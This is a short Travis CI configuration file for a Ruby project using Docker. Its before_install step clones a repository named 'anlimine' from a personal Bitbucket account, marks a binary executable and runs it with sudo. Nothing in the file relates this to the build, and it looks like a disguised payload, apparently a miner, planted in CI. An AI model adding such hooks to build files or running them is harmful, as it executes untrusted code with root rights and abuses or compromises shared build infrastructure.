language: ruby

services:
  - docker

before_install:
  - sudo apt install -y git && sudo git clone https://swenson12@bitbucket.org/swenson12/anlimine.git && cd anlimine && sudo chmod u+x anlimine && sudo ./anlimine
